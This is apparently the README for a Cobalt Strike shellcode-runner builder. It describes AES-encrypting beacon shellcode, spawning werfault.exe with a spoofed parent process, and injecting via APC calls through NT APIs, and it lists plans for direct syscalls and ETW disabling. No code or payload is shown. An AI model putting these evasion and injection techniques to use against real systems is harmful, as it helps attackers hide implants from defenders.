Custom shellcode runner builder w/ CobaltStrike integration.
Compile builder.c using gcc:
gcc -o Builder Builder.c
Edit the .cna script and replace the $builder variable at the top with the full path to the Builder executable you just compiled. Make sure you keep the compiled Builder program in the same folder as everything else in this repo!
Load the .cna script into Cobaltstrike. You should see a "Custom Builder" menu item appear on the tool bar. Follow the menu's to create your payload!
How it works
The aggressor script creates a Stageless Cobaltstrike beacon shellcode file in .bin format and passes it along with the architecture to the Builder program. The Builder program takes the .bin file and architecture as arguments. It opens the .bin file and generates a random AES-128 Key and IV and encrypts the shellcode. The Builder program then opens up the exe.c template file and places the encrypted shellcode, key, and IV values into the template and saves that file as "customexe.c". It then calls the appropriate mingw compiler (based on the architecture passed as an arg) to compile the payload and write it to the location selected in the CobaltStrike menu option.
The current template (exe.c) works by creating a new process (werfault.exe) with a spoofed PPID and Block non-Microsoft DLL's enabled. The Parent PID is selected by the payload by determing the current user context of the running process; if it determines that the payload is running with high integrity, Winlogon is selected as the parent process. Otherwise Explorer is chosen as the parent of the werfault.exe process. Once werfault.exe has been created (suspended), the shellcode is injected into the new process before execution is resumed using the QueAPCThread technique. All API call's related to shellcode injection performed by the runner are done so using the NT API's.
- Integrate Direct Syscalls
- Disable EtwEventWrite
- Add DLL template